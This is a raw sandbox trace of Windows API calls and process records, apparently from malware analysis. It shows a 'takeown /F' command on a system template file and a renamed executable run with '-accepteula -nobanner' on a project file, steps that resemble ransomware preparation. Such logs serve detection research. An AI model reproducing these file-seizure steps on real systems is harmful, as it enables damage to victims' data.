hHeap=0x550000, dwFlags=0x0, lpMem=0x550e00 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x551280 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564348 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55f4c0 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5642e8 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564288 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564210 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5641b8 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.192] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x563670 | out: hHeap=0x550000) returned 1 [0228.192] GetProcessHeap () returned 0x550000 [0228.193] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564168 | out: hHeap=0x550000) returned 1 [0228.193] GetProcessHeap () returned 0x550000 [0228.193] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x551220 | out: hHeap=0x550000) returned 1 [0228.193] _get_osfhandle (_FileHandle=3) returned 0x74 [0228.193] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0228.193] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f550, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x28f550*=0x0, lpOverlapped=0x0) returned 1 [0228.193] GetLastError () returned 0x0 [0228.193] _get_osfhandle (_FileHandle=3) returned 0x74 [0228.193] GetFileType (hFile=0x74) returned 0x1 [0228.193] _get_osfhandle (_FileHandle=3) returned 0x74 [0228.193] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0228.193] GetProcessHeap () returned 0x550000 [0228.193] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x574b00 [0228.193] GetProcessHeap () returned 0x550000 [0228.193] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0228.194] _get_osfhandle (_FileHandle=3) returned 0x74 [0228.194] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0228.194] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f534, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x28f534*=0x0, lpOverlapped=0x0) returned 1 [0228.194] GetLastError () returned 0x0 [0228.194] _get_osfhandle (_FileHandle=3) returned 0x74 [0228.194] GetFileType (hFile=0x74) returned 0x1 [0228.194] _get_osfhandle (_FileHandle=3) returned 0x74 [0228.194] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0228.194] GetProcessHeap () returned 0x550000 [0228.194] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x574b00 [0228.194] GetProcessHeap () returned 0x550000 [0228.194] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574b00 | out: hHeap=0x550000) returned 1 [0228.194] longjmp () [0228.195] _tell (_FileHandle=3) returned 226 [0228.195] _close (_FileHandle=3) returned 0 [0228.195] CmdBatNotification () returned 0x1 [0228.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.195] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.195] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.195] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0228.196] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.196] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0228.196] SetConsoleInputExeNameW () returned 0x1 [0228.196] GetConsoleOutputCP () returned 0x1b5 [0228.196] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.196] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.197] exit (_Code=1) Process: id = "180" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x2f7cc000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "150" os_parent_pid = "0x598" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 712 os_tid = 0x4e8 Thread: id = 726 os_tid = 0x8dc Process: id = "181" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x2f4b5000" os_pid = "0x3f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "175" os_parent_pid = "0xa44" cmd_line = "tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 713 os_tid = 0x3c4 [0189.977] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0189.978] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0189.979] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0189.980] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0189.981] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0189.982] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0189.983] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0189.984] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0189.985] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0189.986] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0189.986] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0189.986] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0189.986] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0189.986] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0189.987] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0189.987] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0189.987] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0189.987] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0189.988] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0189.988] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0189.988] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0189.988] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0189.988] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0189.988] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0189.988] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0189.988] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0189.988] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0189.988] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0189.988] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0189.988] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0189.989] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0189.989] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0189.989] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0189.989] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0189.989] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0189.989] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0189.989] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0189.989] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0189.989] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0190.002] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0190.679] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x2ac29780, dwHighDateTime=0x1d68287)) [0190.679] GetCurrentThreadId () returned 0x3c4 [0190.679] GetCurrentProcessId () returned 0x3f8 [0190.679] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=31101785933) returned 1 [0190.684] GetProcessHeap () returned 0x540000 [0191.238] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0191.239] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0191.240] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0191.240] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0191.240] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0191.240] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0191.241] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0191.241] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0191.241] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0191.241] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0191.242] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0191.242] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0191.243] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0191.243] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0191.243] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0191.243] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0191.244] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0191.244] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0191.244] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0191.244] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0191.244] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0191.245] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0191.245] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0191.245] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0191.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0191.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0191.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0191.246] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0191.246] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0191.247] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0191.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0191.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0191.247] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0191.248] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0191.665] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3bc) returned 0x5560d0 [0191.666] GetCurrentThreadId () returned 0x3c4 [0191.666] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x556498 [0191.674] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x800) returned 0x5564b8 [0191.675] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x16db82cd, hStdError=0x0)) [0191.675] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0191.675] GetFileType (hFile=0x3) returned 0x2 [0191.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0191.676] GetFileType (hFile=0x80) returned 0x3 [0191.676] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0191.676] GetFileType (hFile=0xb) returned 0x2 [0191.677] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" [0191.677] GetEnvironmentStringsW () returned 0x556cc0* [0191.677] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb88) returned 0x557850 [0191.681] FreeEnvironmentStringsW (penv=0x556cc0) returned 1 [0191.682] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0191.682] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7c) returned 0x556cc0 [0191.685] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xa0) returned 0x556d48 [0191.685] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3e) returned 0x5583f8 [0191.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x6c) returned 0x556df0 [0191.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x6e) returned 0x556e68 [0191.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x78) returned 0x54f8f0 [0191.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x62) returned 0x556ee0 [0191.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x556f50 [0191.702] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x48) returned 0x556f88 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2c) returned 0x556fd8 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x28) returned 0x557010 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1a) returned 0x555aa0 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x4a) returned 0x557040 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x72) returned 0x54f970 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x557098 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x5570d0 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1c) returned 0x555ac8 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xd2) returned 0x557108 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x7c) returned 0x5571e8 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x36) returned 0x557270 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3a) returned 0x558440 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x90) returned 0x5572b0 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x557348 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x557378 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x36) returned 0x5573b0 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x48) returned 0x5573f0 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x52) returned 0x557440 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x558488 [0191.703] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x18) returned 0x5574a0 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x82) returned 0x5574c0 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x557550 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1e) returned 0x555af0 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, 